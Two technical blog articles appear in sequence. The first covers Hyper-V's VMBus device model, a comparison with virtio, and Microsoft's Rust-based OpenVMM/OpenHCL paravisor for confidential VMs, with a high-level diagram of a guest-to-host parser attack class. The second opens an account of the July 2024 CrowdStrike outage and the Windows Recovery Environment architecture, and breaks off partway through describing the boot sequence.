sequenceDiagram participant Mal as Malicious guest VM participant Ring as VMBus ring (shared memory) participant SInt as Synthetic Interrupt Controller participant VSP as Host VSP (e.g., vmswitch.sys, kernel) Mal->>Ring: Write crafted RNDIS-style message Mal->>SInt: Hypercall: signal channel event SInt-->>VSP: SINT delivered on host CPU VSP->>Ring: Read message header note over VSP: Length confusion / missing bounds check VSP->>VSP: Out-of-bounds write in root partition kernel note over VSP: Result: arbitrary code in the most privileged partition

Mitigations short of a rewrite

Microsoft's first line of defence is the same one every kernel team uses: ASLR, control-flow integrity, kernel hardening, fuzzing the parsers, code review of every new device class, and, on Azure specifically, isolating each tenant's compute hypervisor so a single compromised host does not become a multi-tenant disaster. The MSRC bounty program is partly a procurement mechanism for this same effort: pay researchers to find and report bugs before attackers find them in the wild.

A second line of defence is Generation-2 VMs (Microsoft Learn [@ms-gen1-gen2-vms]), which remove the legacy emulators (IDE, PS/2, PIC) from the host data path entirely. Every emulator removed is one fewer parser in the most privileged kernel.

A third is the Microsoft Hyper-V architecture page [@ms-hyperv-architecture-perf]'s "minimise root-partition exposure" guidance: configure hosts with the smallest set of root-partition services that the workload requires, since every service is potential surface.

These all help, but none of them change the structural fact that VSPs parse guest-controlled data in C/C++ kernel code. The next architectural shift, the one that does change that fact, is what Section 9 is about.

Side channels and the Spectre era

VMBus also has to defend against side-channel attacks across the partition boundary. The same Spectre / Meltdown / L1TF mitigations that apply to a multi-tenant hypervisor in general apply to Hyper-V specifically. Microsoft's broader hypervisor mitigation strategy interacts with VMBus mostly indirectly: the SynIC, the hypercall page, and the timer subsystem all needed audit and adjustment when these classes of attacks emerged. The detail is largely outside the scope of an article about the device model, but the takeaway is consistent with the rest of this section: any shared CPU resource between partitions is a potential attack surface, and "shared via the hypervisor's bus" is no exception.

The structural answer to all of this, the one Microsoft itself has been working toward, is to change the languages and the trust boundaries. To set that up, the next section first widens the field by comparing VMBus to its peer in the KVM world, virtio.

8. VMBus vs virtio: two answers to the same question

Hyper-V is not the only hypervisor with a paravirt I/O story. The KVM world evolved its own answer to the same problem at roughly the same time, and it ended up with a different design with different trade-offs. The standard is virtio.

The original virtio paper, Rusty Russell's "virtio: Towards a De-Facto Standard For Virtual I/O Devices" [@rusty-virtio-paper], was published at OLS 2008, the same year Hyper-V shipped. The proposal was explicit in its motivation: every hypervisor was reinventing paravirt drivers, and a single hypervisor-independent specification could let one guest driver work everywhere. OASIS later standardised virtio 1.0 in 2016, then virtio 1.1 in 2019 [@oasis-virtio-1-1], then virtio 1.2 as a Committee Specification in 2023 [@oasis-virtio-1-2].

A hypervisor-independent paravirtual I/O specification, governed by OASIS. A virtio device is presented to the guest over a transport (PCI, MMIO, or s390 channel I/O) that advertises capability bits. The data plane is a generic ring layout called a **virtqueue**: a ring of descriptors, an `avail` ring (guest-to-host), and a `used` ring (host-to-guest). Each device class (virtio-net, virtio-blk, virtio-scsi, virtio-fs, virtio-gpu) defines its own message format on top of virtqueues.

The same shape, viewed sideways

Architecturally, virtio and VMBus are sibling answers to the same shaped problem.

flowchart LR subgraph virtio_pci["virtio over PCI"] gv["Guest virtio driver"] vq["virtqueue (descriptors + avail + used)"] host_be["Host backend (vhost-net, vhost-user, OpenVMM)"] gv -- "PIO doorbell write" --> host_be gv -- "shared memory" --- vq host_be -- "shared memory" --- vq host_be -- "MSI-X" --> gv end subgraph vmbus["Hyper-V VMBus"] gv2["Guest VSC"] ring["Two ring buffers + GPADL"] vsp["Host VSP (kernel)"] gv2 -- "Hypercall doorbell" --> vsp gv2 -- "shared memory" --- ring vsp -- "shared memory" --- ring vsp -- "SINT" --> gv2 end

Both:

Use shared-memory rings for payload.The phrase "shared-memory rings" hides a small subtlety: a ring buffer is a circular buffer with separate read and write indices. Producer and consumer can run concurrently as long as they only touch their own index, which is what makes ring buffers a wait-free communication primitive on cache-coherent hardware.
Use a doorbell for signalling.
Batch many requests per doorbell so per-message hypercall cost amortises.
Have per-class device protocols layered on top of a common transport.

The differences are where the world bites:

Dimension	VMBus	virtio (1.2)
Transport	Software-only "bus", channel offer/open/close	PCI, MMIO, s390 channel I/O
Doorbell	Hypercall (`HV_SIGNAL_EVENT`)	PIO write to a doorbell BAR
Reverse signal	Synthetic interrupt (SINT)	MSI-X
Standardisation	Microsoft-owned, Open Specification Promise [@ms-tlfs]	OASIS-ratified, multi-vendor
Windows in-box drivers	Yes, every supported version	No; out-of-box signed VirtIO INFs from cloud vendors
Device classes beyond I/O	Yes: KVP, time sync, VSS, balloon	Limited; non-I/O often built on virtio-vsock or out-of-band agents
Cross-hypervisor portability	Hyper-V only	Universal: KVM, QEMU, Cloud Hypervisor, Firecracker, Xen HVM, OpenVMM
Spec governance	Single vendor under OSP	Multi-vendor with formal conformance clauses
Source for Linux side	drivers/hv/ [@kernel-hyperv-index]	drivers/virtio in the Linux tree

Where each design wins

Virtio's strongest claim is portability. The same Linux guest VM image, with the same in-tree virtio drivers, runs on KVM, QEMU, Cloud Hypervisor, AWS Firecracker, and (since 2024) Microsoft's own OpenVMM, which added virtio backend support. A workload that has to move between cloud providers benefits from this directly: the guest does not need a different driver stack per host.

Virtio also has a richer multi-vendor governance story. The spec is OASIS-ratified, with explicit conformance clauses; multiple commercial hypervisors implement it; multiple SmartNIC vendors implement virtio data planes in hardware (the vDPA and VDUSE work, described by Red Hat [@redhat-vdpa] and the Linux kernel VDUSE doc [@kernel-vduse]).

VMBus's strongest claim is integration. Every supported Windows ships with the VSCs in-box; there is nothing for an admin to install. The transport carries not just I/O but a service catalogue: KVP for guest configuration, time sync, VSS for online backup, the heartbeat and shutdown channels. The TLFS, while owned by Microsoft, is published under the Open Specification Promise and is a single document a guest author can read end-to-end.This is why "VirtIO drivers for Windows" exist as a separate project (the Fedora/Red Hat-signed virtio-win package) for KVM clouds: out of the box, Windows does not know virtio. The Hyper-V world inverts the problem: out of the box, Linux does not need any third-party install because the drivers are upstream.

Where they coexist

The most interesting recent development is that the two camps have stopped being purely competitive. Microsoft's OpenVMM [@github-openvmm] implements both VMBus and virtio backends, so a Linux guest using virtio drivers can run on a Microsoft-developed VMM, and a Windows guest using VMBus drivers can run on the same VMM. This is partially ideological (Microsoft is no longer pretending its way is the only way) and partially pragmatic (a single VMM that supports both transports is simpler than maintaining two).

Beyond the protocol-level comparison, both VMBus and virtio sit inside a larger composition with hardware passthrough, where the transport becomes the slow path and a real PCIe device carries the steady-state traffic.

Hardware passthrough as a complement

The composition that runs almost every modern Azure VM is VMBus + SR-IOV, packaged as Accelerated Networking [@ms-accelerated-networking]. The same VM gets both a synthetic NIC (netvsc over VMBus) and an SR-IOV virtual function. The Linux netvsc driver documentation describes the failover mechanic: "If SR-IOV is enabled in both the vSwitch and the guest configuration, then the Virtual Function (VF) device is passed to the guest as a PCI device. In this case, both a synthetic (netvsc) and VF device are visible in the guest OS and both NIC's have the same MAC address. The VF is enslaved by netvsc device. The netvsc driver will transparently switch the data path to the VF when it is available and up." (Linux kernel: netvsc [@kernel-netvsc]).

When live migration starts, Azure revokes the VF, the data plane falls back to the netvsc/VMBus path, the VM moves, and a new VF on the destination host gets re-attached, all without dropping TCP connections. The VMBus path was never the production hot path, but its existence is what enables migration. The KVM world's analogue is vDPA, which gives a virtio-shaped guest interface backed by a hardware data plane.

A modern Azure NIC stack is pushing this even further. Azure Boost [@ms-azure-boost] moves both storage and networking data planes off the host CPU into dedicated FPGAs, with a stable Microsoft-engineered NIC interface called MANA [@ms-mana]. Microsoft's documentation reports up to 200 Gbps of network bandwidth and 6.6 million IOPS on local storage with this design, with the host's vmswitch still acting as the live-migration fallback path. The architectural insight is that the VMBus-based slow path is the durable invariant; what changes is whether the steady-state data plane is software, an SR-IOV VF, or a SmartNIC firmware path. Frameworks like DPDK [@dpdk-about] sit on top of whichever data plane the VM exposes.

What none of this changes is the property Section 7 cared about: as long as a host-side VSP exists and parses guest-controlled bytes in kernel C/C++, the bug class is open. The next section is about the architectural move that closes it.

9. OpenVMM and OpenHCL: the 2024 open-source pivot

In 2024, Microsoft did two things that would have been hard to imagine a decade earlier. First, they open-sourced OpenVMM [@github-openvmm], a Rust implementation of the virtualization stack including the VSPs and the VMBus protocol. Second, they introduced OpenHCL [@ms-openhcl-deep-explainer], a "paravisor" configuration of OpenVMM that runs inside a confidential VM as a higher-trust mediator between the workload and the (now-untrusted) host.

Both moves are explained by the same trend the article has been circling: confidential computing fundamentally inverts the trust boundary, and the device model has to follow.

A higher-privileged software layer that runs *inside* a guest VM (not on the host) and mediates the guest's interaction with the hypervisor. In the Hyper-V model, a paravisor lives in VTL2 of the same VM whose workload runs in VTL0; the host hypervisor is outside the VM's trust boundary. The paravisor presents the workload with a familiar VMBus + VSP interface while internally talking to a hardware-isolated confidential VM substrate (AMD SEV-SNP or Intel TDX).

What changed in confidential computing

The classical Hyper-V trust model places the root partition at the apex of trust. The guest trusts the host. Memory the guest writes is, in the worst case, readable by the host. In confidential computing, that is no longer acceptable. A regulated workload (a healthcare database, a financial processor) needs to run in a VM whose contents are protected even from a malicious or compromised hypervisor. AMD's SEV-SNP and Intel's TDX are CPU features that encrypt and integrity-protect VM memory in hardware so that a compromised host cannot read the guest's secrets.

Azure Confidential Computing [@ms-confidential-computing] made these capabilities available as a product starting around 2022. The Azure confidential VM options page [@ms-coco-vm-options] documents the SKUs.

This breaks the old VMBus story. In the classical model, the host's vmswitch.sys reads the guest's network packets out of the VMBus ring. In a confidential VM that protection demands you can no longer let the host see those bytes; that defeats the entire point. So the question becomes: where does the synthetic-device backend live, if not in the host?

The paravisor answer

The Linux kernel's Hyper-V CoCo VMs document [@kernel-coco] describes the design directly: "Paravisor mode. In this mode, a paravisor layer between the guest and the host provides some operations needed to run as a CoCo VM. The guest operating system can have fewer CoCo enlightenments than is required in the fully-enlightened case ... some aspects of CoCo VMs are handled by the Hyper-V paravisor while the guest OS must be enlightened for other aspects."

OpenHCL is that paravisor. It runs in a higher-trust virtual trust level inside the same confidential VM (VTL2), it has access to the encrypted-memory primitives the CPU provides, and it presents the workload (in VTL0) with the same VMBus + VSP world a non-confidential VM would see. The workload OS does not need to be heavily modified; it sees what looks like Hyper-V, talks to what look like normal VSPs, and never has to know that those VSPs are now inside its own VM rather than on the host.

flowchart TD HW["Confidential CPU (SEV-SNP / TDX)"] HV["Host hypervisor (untrusted by the workload)"] subgraph CoCoVM["Confidential VM (memory encrypted)"] VTL2["VTL2: OpenHCL paravisor (Rust VSPs)"] VTL0["VTL0: workload OS (Windows or Linux, lightly enlightened)"] VTL0 -- "VMBus, looks normal" --- VTL2 end HW --> HV HV --> CoCoVM HV -. "no access to guest plaintext" .-> CoCoVM

The Rust rewrite

The other half of the story is memory safety. Recall Section 7's CVE list: every headline Hyper-V escape in the past decade involved a parser bug in C/C++ kernel code. OpenVMM's choice to implement the entire VMM, including the VSPs, in Rust is a direct response to that history. Rust's ownership model rules out, by construction, a large class of memory-safety bugs (use-after-free, out-of-bounds access on slices, double-free) that produced those CVEs.

This does not magically eliminate every vulnerability. A logic bug in a state machine, an integer-overflow on a length field, a side-channel timing leak: all of these still exist in Rust. But the categories that produced CVE-2017-0075, CVE-2021-28476, and CVE-2024-21407 are exactly the categories Rust was designed to make hard.

Garbage-collected languages are wrong for a kernel-mode parser: GC pauses are unacceptable in a hypervisor-adjacent fast path, and you cannot afford a runtime that allocates memory during interrupt handling. Rust's compile-time memory safety with no GC is, today, the only mature option that gives you both the safety and the predictability a VSP needs. Microsoft's choice is consistent with the rest of the industry; comparable rewrites of low-level systems infrastructure (Cloudflare's `cf-cmd`, Mozilla's `quiche`, the Android Bluetooth stack) have all converged on Rust.

What you can actually look at

OpenVMM is not a press release; it is a public repository that ships:

The full Rust source tree at github.com/microsoft/openvmm [@github-openvmm].
A separate repository for the Linux kernel fork that the paravisor runs on top of, at github.com/microsoft/OHCL-Linux-Kernel [@github-ohcl-linux].
Project documentation centred at openvmm.dev [@openvmm-dev].
Both VMBus and virtio backends, so the same VMM can host Windows guests on VMBus and Linux guests on virtio.
Documentation through the deeper Microsoft Tech Community explainer [@ms-openhcl-deep-explainer] and the original announcement [@ms-openhcl-announce] describing the paravisor's role.

For a security researcher or a regulated-cloud customer, this is a meaningful change. For the first time, the VMBus + VSP stack is auditable end-to-end in source.

If you want to see how a VSP actually consumes a channel, the OpenVMM repository contains the Rust modules that implement the VMBus channel state machine. Cloning the repo and grepping for `Channel::open` and `RingBuffer` shows the same offer/open/close/rescind pattern Section 3 described, expressed in Rust types whose lifetimes the compiler checks. Reading the same logic in Rust after reading the Linux C version in `drivers/hv/channel_mgmt.c` is a useful exercise; the abstraction is identical, and the safety guarantees diverge.

What still has to be solved

The kernel CoCo doc is candid about an open architectural problem that OpenHCL alone cannot solve: "Unfortunately, there is no standardized enumeration of feature/functions that might be provided in the paravisor, and there is no standardized mechanism for a guest OS to query the paravisor for the feature/functions it provides. The understanding of what the paravisor provides is hard-coded in the guest OS." (Linux kernel: CoCo VMs [@kernel-coco]).

In other words, the TLFS gave us a portable contract between guests and Hyper-V hypervisors. The paravisor world does not yet have an equivalent portable contract between guests and paravisors. Today's guests have OpenHCL-specific knowledge baked in. A future "paravisor TLFS" would let any compliant paravisor host any compliant guest, the same way the original TLFS did for the hypervisor. That standard does not exist yet, and writing it is the most consequential open problem in this corner of the architecture.

The architecture is moving. Section 10 takes stock of what that means for engineers building or operating on this stack today.

10. Engineering takeaways and open problems

A working architecture is one where the trade-offs are visible. Hyper-V's enlightenments + VMBus + VSP/VSC stack is a working architecture in exactly that sense: every property it has, including the security ones, is a consequence of design choices a reader can name.

What the design optimises for

Three explicit optimisations:

In-box drivers for closed-source guests. Hardware virtualization handles privileged CPU instructions; the guest only needs to load a VMBus client driver to opt in to the fast path. Every supported Windows ships those drivers in-box. Every modern Linux ships them in-tree. There is no "install paravirt drivers" step, which is a large reason "it just works."
A single transport that carries everything. VMBus carries 12+ device classes plus non-device services (KVP, time sync, VSS, balloon, heartbeat). One protocol, one set of primitives, one debugging surface. This is the engineering equivalent of "everything is a file" applied to inter-partition communication.
Live migration. Because the data plane is software in the root partition, the VM is not bound to a specific host. The VSPs serialise their state during migration without guest cooperation. This is the property that makes VMBus the durable invariant under hardware-passthrough acceleration: SR-IOV gives you throughput; VMBus gives you mobility.

What it pays for those properties

Two costs:

The host CPU is on the data plane. A software ring serviced by vmswitch.sys cannot match a 100 GbE NIC's line rate per host CPU core. Microsoft's answer is hybrid composition with SR-IOV (Accelerated Networking [@ms-accelerated-networking]) and SmartNIC offload (Azure Boost + MANA [@ms-azure-boost]). The KVM analogue is vDPA [@redhat-vdpa]. Both of these accept the structural truth that for the highest throughputs, the host CPU has to leave the data plane.
The host kernel parses guest-controlled bytes. Section 7's CVE record is the catalogue of what that costs. The architectural answer is OpenHCL: move the parser into the guest's own trust boundary and rewrite it in Rust.

A four-property idealisation

It is useful to write down what an idealised paravirt I/O stack would do, so it is clear which properties any real stack today is trading away.

The four idealised properties:

Zero hypercalls per packet in steady state.
Live-migration parity with a software baseline.
Cross-vendor / cross-hypervisor portability of the guest driver.
No host-side memory-unsafe parser of guest-controlled data.

Approach	(1) Zero hypercall	(2) Live migration	(3) Portability	(4) No unsafe host parser
VMBus + in-kernel VSP	partial (batched)	yes	no	no
virtio + vhost-net	partial (batched)	yes	yes	no
SR-IOV / DDA	yes	no	no	yes
Accelerated Networking (VMBus + SR-IOV)	yes (steady)	yes	no	no
vDPA	yes	partial	yes	no
OpenHCL paravisor + VMBus	partial	yes	partial	yes
Azure Boost + MANA	yes	yes	no	partial

No single approach today matches all four properties. The Hyper-V production composition is roughly (VMBus baseline) + (Accelerated Networking for throughput) + (OpenHCL for confidential workloads). The KVM-world composition is (virtio baseline) + (vDPA / SmartNIC for throughput). SmartNIC-based stacks (Azure Boost, AWS Nitro, Google's offload) approach the same four-corner problem from yet another angle.

This is a synthesis, not a single-source claim: the matrix combines properties documented separately in the Microsoft Accelerated Networking docs [@ms-accelerated-networking], the Linux kernel CoCo doc [@kernel-coco], the Discrete Device Assignment doc [@ms-dda], the SR-IOV overview [@ms-sriov-overview], the Linux netvsc driver doc [@kernel-netvsc], the VDUSE userspace interface [@kernel-vduse], the vPCI doc [@kernel-vpci], and the OpenHCL explainer [@ms-openhcl-deep-explainer]. Each individual cell is sourced; the ranking is the author's reading of those sources.

Practical pitfalls for operators

A few things the customer-facing docs do not always say plainly:

vmbusrhid is not low-risk. The keyboard/mouse channel is a kernel-level RPC surface from guest to root. Treat it the same way you would treat netvsc when modelling threat exposure.
Generation-2 VMs reduce attack surface. Choosing Generation-2 for new workloads removes the legacy IDE/PS/2/PIC emulators from the host data path entirely (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]).
Mixing in-box and out-of-band Integration Services breaks things. Modern Windows and modern Linux already have the drivers; installing the legacy LIS package on top can break MSI-X handling and PCI passthrough (Linux kernel: overview [@kernel-hyperv-overview]).
DDA is not SR-IOV. Discrete Device Assignment covers any PCIe device passthrough, but Microsoft formally supports only GPUs and NVMe as device classes (Microsoft Learn: DDA planning [@ms-dda]).
Confidential VMs do not have the same device set. Hardware constraints reduce or alter the device classes available; always validate the specific synthetic devices your workload depends on are present in the target SKU (Linux kernel: CoCo [@kernel-coco]).

Note: 1. Confidential VM (SEV-SNP / TDX)? Use the OpenHCL paravisor mode (Azure CoCo VM options [@ms-coco-vm-options]). 2. Need ≥40 Gbps with live migration? Use Accelerated Networking; on Boost-enabled SKUs, Boost adds another tier of offload. 3. Need ≥100 Gbps and accept binding to host? Use Discrete Device Assignment / SR-IOV. 4. Maximum guest portability across hypervisors? Use virtio; for bandwidth-sensitive workloads, vDPA. 5. Default Hyper-V workload, broad device coverage, native migration? VMBus + VSP (the default).

Open problems worth watching

The substantive open problems are:

A standardised paravisor feature-enumeration interface. OpenHCL is the first auditable paravisor, but there is no portable contract a guest can use to query "what does this paravisor support." The TLFS gave us this for hypervisors; the paravisor analogue is missing (Linux kernel: CoCo [@kernel-coco]).
Confidential-VM-friendly live migration with paravirt devices. Hardware-attested state cannot be cloned trivially; today's pragmatic answer is to constrain migration in CoCo VMs. A general solution is open.
A formal model of the VMBus offer/rescind state machine. The kernel docs describe it narratively. A model that the VSP code could be checked against would let static analysis rule out the bug class behind the headline CVEs.
Live-migrating stateful SR-IOV VFs without device cooperation. Vendor proposals exist; an industry standard does not.
Erasing memory-unsafety in legacy VSPs. The Rust rewrite path in OpenVMM is correct; the multi-year engineering effort to convert every existing VSP is real. CVE-2024-21407 is recent enough to remind everyone the bug class is still producing fresh entries.

What to remember in five years

The most important sentence in this article is one I have been quietly preparing throughout: the durable architectural invariant in Hyper-V is shared-memory ring + doorbell, with a published guest-side contract. Everything else, including the choice of programming language for the VSP, the question of whether the data plane is software or hardware, and even whether the trust boundary places the VSP on the host or in a paravisor, is implementation. The transport is the invariant. That is the lesson the next decade of CoCo VMs and SmartNIC offload is converging toward: keep the contract stable, and let everything else change.

FAQ

No. The drivers (`hv_vmbus`, `hv_netvsc`, `hv_storvsc`, `hv_utils`, `pci-hyperv`, `hv_balloon`) have been in the upstream Linux kernel since 2.6.32 in December 2009 and ship in every mainstream distribution. The legacy LIS package is a holdover from the era before in-tree support and can in fact break MSI-X handling and PCI passthrough if installed on top of a modern kernel (Linux kernel: Hyper-V overview [@kernel-hyperv-overview]). Because the trust gradient is asymmetric. The VSP runs in the root partition's kernel, the most privileged context on the box; the VSC runs in a normal guest kernel. Bytes flowing from guest to host get parsed by code with full system privilege. A VSC bug typically harms only the guest; a VSP bug can be a cross-tenant compromise. The pattern is visible in the CVE record: CVE-2017-0075 [@nvd-cve-2017-0075], CVE-2021-28476 [@nvd-cve-2021-28476], and CVE-2024-21407 [@nvd-cve-2024-21407] all hit host-side parsers. For live migration. SR-IOV gives you near-bare-metal throughput but binds the VM to a specific physical NIC; you cannot migrate that state. Keeping a VMBus-backed `netvsc` device in the same guest gives the hypervisor a software path it can fall back to during migration windows. The Linux kernel netvsc doc describes this failover explicitly: when SR-IOV is enabled, the VF is enslaved by netvsc and the data path switches transparently when the VF is up (Linux kernel: netvsc [@kernel-netvsc]). OpenHCL is a *configuration* of OpenVMM, not a separate codebase. OpenVMM is the Rust virtualization stack at github.com/microsoft/openvmm [@github-openvmm]; OpenHCL is OpenVMM run as a paravisor inside a confidential VM's higher-trust virtual trust level (VTL2), so that the synthetic-device backends sit inside the guest's own trust boundary rather than on a host the guest cannot trust. The same Rust code can run as a host-side VMM (when paired with a hypervisor on the host) or as an in-guest paravisor (when running inside a SEV-SNP or TDX VM). Both directions exist with caveats. OpenVMM, when used as a host VMM, supports both VMBus and virtio backends, so a Linux virtio guest can run on a Microsoft-developed VMM (github.com/microsoft/openvmm [@github-openvmm]). Native Hyper-V on a Windows Server host historically expects VMBus-driven guests; there is no in-box virtio device emulation on a stock Hyper-V Server. KVM hosts can technically present a VMBus-shaped device, but in practice the production answer on KVM is virtio. Generation-2 VMs use UEFI with Secure Boot, boot from synthetic SCSI, and have no emulated IDE, PS/2, or PIC in the data path (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]). Every emulator that is removed is one fewer parser running in the most privileged kernel on the host, so the host-side attack surface is meaningfully smaller. Generation-1 still exists for legacy guests that only know how to boot from BIOS + IDE. VBS uses the Hyper-V hypervisor to split a single Windows install into VTL0 (the normal kernel and apps) and VTL1 (the Secure Kernel and trustlets like `lsaiso.exe`). The hypervisor enforces that VTL0 cannot read or modify VTL1's memory, even with kernel privileges. So an attacker who already has SYSTEM-level code execution in the normal world cannot trivially extract LSASS secrets or load arbitrary unsigned kernel code; the hypervisor stops them. This works on any modern Windows machine with the right CPU features, regardless of whether you ever run a VM yourself (Microsoft Learn: Windows Server 2016 What's New [@ms-server-2016]).

The Day 8.5 Million Devices Couldn't Boot -- and How Microsoft Rebuilt Recovery as a Security Surface

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**On July 19, 2024, the Windows Recovery Environment worked exactly as designed -- and that was the problem.** WinRE assumed a human operator per machine, and CrowdStrike's Channel File 291 priced that assumption at 8.5 million endpoints. The Windows Resiliency Initiative -- Quick Machine Recovery, MVI 3.0, the user-mode endpoint security platform, Intune-surfaced WinRE state, Point-in-Time Restore, and Cloud Rebuild -- is Microsoft's first systemic admission that the recovery path is part of the security architecture. This article maps the architecture, the program, and the trade-off it cannot remove.

1. A Fleet That Cannot Boot Itself

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 to its Falcon sensor on Windows. Forty-eight minutes later -- 04:57 UTC, give or take an hour depending on which time zone the failing devices happened to wake into -- the calls began. By the time CrowdStrike reverted the file at 05:27 UTC, roughly 8.5 million Windows endpoints were stuck in a bug-check loop on csagent+0xe14ed: a read-out-of-bounds page fault inside a kernel-mode driver registered as SERVICE_SYSTEM_START (Start=1), so it reloaded on every reboot [@crowdstrike-tech-details, @ms-security-jul27, @ms-crowdstrike-jul20].

The fix was published almost immediately. "Boot to Safe Mode," it said. "Delete C-00000291*.sys. Reboot." If the volume was BitLocker-encrypted, find the recovery key first [@ms-kb5042421]. The instruction was technically correct. It was also a procedure for one machine. The Windows Recovery Environment that the procedure depended on -- WinRE -- worked exactly as it was designed to work, on every one of those 8.5 million devices [@ms-crowdstrike-jul20]. That was the problem.

Think about the engineering. The recovery partition was where it should be. The Boot Configuration Data store pointed at the right winre.wim. The two-failed-boots trigger fired. The blue Safe Mode tile rendered. The keyboard input handler took keystrokes. The NTFS read-write driver inside WinRE deleted the bad channel file. The reboot succeeded. Every line of code in the recovery path behaved exactly as the engineers in Redmond had specified. The architecture did not break.

What broke was the architecture's central assumption: that a person would be sitting in front of the screen.

The assumption was a security choice as much as a usability choice, and that the cost of that choice was a denial-of-service event measured not in seconds of downtime but in person-days of triage. What follows: the WinRE architecture as it actually exists on every Windows 11 device today, the lineage that produced that architecture, the failure mode that priced the architecture's blind spot, and the Windows Resiliency Initiative that Microsoft began assembling in the months after the incident.

A second thesis follows from the first. Recoverability is a security property. A platform that cannot recover at scale cannot guarantee availability; a platform that cannot guarantee availability cannot keep its confidentiality and integrity promises either, because operations teams in the middle of a fleet-down event will eventually pull every encryption layer and every signing check that gets in their way. The two halves of the CIA triad we usually study -- confidentiality and integrity -- have spent decades crowding out the third. CrowdStrike forced the third one back onto the page.

If WinRE worked perfectly on July 19, 2024, what does it actually do? And how did a recovery primitive end up being the architecture's single point of human dependence? Those questions are next.

2. The Architecture: WinRE, `winre.wim`, `boot.sdi`, ReAgentC

Before we explain how WinRE failed at scale, we have to be precise about what WinRE is. Most engineers know it as the screen that appears after two bad boots. That description is correct and unhelpful. WinRE is a Windows Preinstallation Environment image -- winre.wim -- backed by a system deployment image ramdisk and managed by ReAgentC.exe, registered with the Windows Boot Manager via an entry in the Boot Configuration Data store [@ms-winre-tech-ref, @ms-reagentc, @ms-bcd]. Each of those four moving pieces does one job; together they make the recovery surface possible.

A small, self-contained Windows operating system used to install, deploy, and repair Windows desktop editions and Windows Server [@ms-winpe-intro]. WinPE is the substrate of Windows Setup, the install media's `boot.wim`, and `winre.wim`. The base image requires 512 MB of RAM and automatically reboots after 240 hours of continuous use on Windows 10 1803 and later [@ms-winpe-intro]. Originally released to manufacturing in 2002 by a Microsoft team that included Vijay Jayaseelan, Ryan Burkhardt, and Richard Bond [@wiki-winpe]. A small image-format file that the Windows Boot Manager uses to allocate a RAM disk into which a WIM image can be mounted at boot time. The WinRE BCD entry references `boot.sdi` through a `ramdiskoptions` element; the `osdevice` element then names `winre.wim` as the image to mount inside that RAM disk [@ms-bcd, @ms-winre-tech-ref]. The binary database that replaced `boot.ini` in Windows Vista. The BCD lives on the EFI System Partition on UEFI machines and is the data structure the boot manager reads to decide what to boot. Each entry is a typed collection of *elements* -- `device`, `osdevice`, `path`, `winpe`, `ramdiskoptions`, `recoverysequence`, and others -- manipulated with `bcdedit.exe` [@ms-bcd]. A dedicated GPT partition holding `winre.wim`, identified by partition Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and recommended for placement immediately after the Windows partition. The minimum size is 300 MB, with 250 MB of free space recommended to accommodate future updates [@ms-uefi-gpt]. On Image Configuration Designer media, this partition is the default layout; clean Setup may instead use a `\Recovery\WindowsRE` folder inside the Windows partition [@ms-winre-tech-ref].

Restated in the order a practitioner encounters them on disk, the four pieces are:

The recovery partition. The default UEFI/GPT layout from the Image Configuration Designer places a Windows RE Tools partition after the Windows partition, sized to hold winre.wim with headroom for cumulative-update growth [@ms-uefi-gpt]. The GPT Type ID DE94BBA4-06D1-4D40-A16A-BFD50179D6AC lets bootmgr find the partition without depending on the Windows volume's drive letter. A \Recovery\WindowsRE folder inside the OS volume is an equally valid alternative; some OEMs use one, some the other.The variability is invisible at runtime: bootmgr follows the BCD, not the disk layout. But it matters at provisioning time. Always check reagentc /info after deployment to know which arrangement you have, because the Microsoft-recommended fix for "winre.wim is too small after a cumulative update" (KB5028997) depends on which partition the image lives in.
winre.wim. A customised WinPE image. The lineage goes back to Windows PE 1.0, RTMed in 2002 from Windows XP RTM [@wiki-winpe]. Today's winre.wim is built from Windows 10 / 11's WinPE 10 line and includes the recovery shell, Startup Repair, System Restore (when enabled on the host), command prompt, and a curated list of optional drivers. The base image still inherits the WinPE rules: 512 MB minimum RAM, 240-hour reboot cap on Windows 10 1803+ [@ms-winpe-intro].
boot.sdi. Sits on the recovery partition (or in \Recovery\WindowsRE\) and acts as a fixed-size container into which the boot manager creates a RAM disk at boot time [@ms-bcd].The .sdi extension stands for *System Deployment Image*, the same file format used by older Windows Deployment Services workflows in which a thin ramdisk holds a boot.wim for PXE installs. The RAM disk is where winre.wim is mounted. boot.sdi is small (a few megabytes), unmodifiable in normal operation, and one of the parsers later abused by the BitUnlocker chain [@ms-bitunlocker-blog]; we return to that in Section 9.
ReAgentC.exe. The in-box management tool. Microsoft Learn documents the supported switches: /info, /enable, /disable, /setreimage /Path <Folder>, /boottore, /setbootshelllink, and the now-deprecated /setosimage (no longer used on Windows 10 or later) [@ms-reagentc]. The same page notes that for offline operations on WinPE 2.x/3.x/4.x images, administrators must instead use Winrecfg.exe from the Windows Assessment and Deployment Kit -- a clue that the online mode of ReAgentC.exe predated the offline mode. The tool has shipped since at least Windows 7; the precise RTM month is not surfaced on Microsoft Learn today.The web is full of confident claims that ReAgentC.exe first shipped in Vista, Windows 7, or Windows 8. The safe attribution is "Windows 7 onwards" because that is the era when the recovery-partition + ReAgentC model became the supported default. Microsoft Learn does not name an exact ship version, and the AI summaries that do are inferring from circumstantial evidence [@ms-reagentc].

All four pieces have to cooperate at the worst possible moment: when the Windows partition refuses to boot. The question for the next section is the literal handoff. How does the firmware end up running winre.wim?

3. The Mechanism: How a WinRE Boot Actually Happens

There is a sentence that appears in dozens of TechNet-era guides and AI summaries: Windows boots WinRE by running winload.exe /recovery. That sentence is wrong. There is no /recovery switch on winload.efi or winload.exe. The BCD Boot Options Reference enumerates every legal element on a boot entry, and recoverysequence is one of them; a command-line switch with that name is not [@ms-bcd]. WinRE is selected through the BCD, not through a flag passed to the loader.

Note: The BCD Boot Options Reference defines every element on a boot entry: device, osdevice, path, description, recoverysequence, winpe, ramdisksdidevice, ramdisksdipath, and a few dozen others [@ms-bcd]. None of them is exposed as a winload.exe /recovery command-line flag. The recovery handoff happens entirely inside the boot manager, before winload.efi ever runs.

Walk the literal boot sequence on a UEFI machine [@ms-winre-tech-ref, @ms-bcd]:

Firmware passes control to bootmgfw.efi on the EFI System Partition. (On legacy BIOS, it would be bootmgr from the active partition.)
The boot manager reads the BCD store. There is one entry of type Windows Boot Manager and one or more entries of type Windows Boot Loader.
